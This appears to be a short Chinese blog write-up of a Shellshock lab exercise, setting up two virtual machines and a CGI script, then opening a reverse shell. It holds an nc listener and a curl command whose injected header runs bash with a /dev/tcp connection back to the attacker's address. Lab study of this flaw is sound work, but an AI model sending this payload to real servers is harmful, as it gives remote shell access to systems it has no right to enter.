破壳漏洞学习实验

今天在雪城大学的网络实验室学习了著名的破壳漏洞，下面分享一下对此漏洞进行的实战

1. 首先在vbox中，我们将两台虚拟机设置为在同一局域网段，不知道如何设置局域网段？点击这里
2. 然后我们在被攻击机上建立一个myprog.cgi的文件，在其中写入含有bash调用的代码

#!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Hello World"

 3.将文件复制到/usr/lib/cgi-bin中并进行权限修改使得其能够被执行

4.我们可以通过另一台机器进行尝试访问，在我这里，被攻击机IP地址为10.0.2.5，攻击机IP地址为10.0.2.4，输入：http://10.0.2.5/cgi-bin/myprog.cgi可以看到，浏览器能够成功访问

5.下面，我们通过shell反弹来登录被攻击机，首先，进行nc监听

nc -lv 4444

6.新打开一个终端，输入

curl -H 'x: () { :;}; /bin/bash -i >& /dev/tcp/攻击IP/4444 0>&1' http://被攻击IP/cgi-bin/myprog.cgi

7.效果如图，成功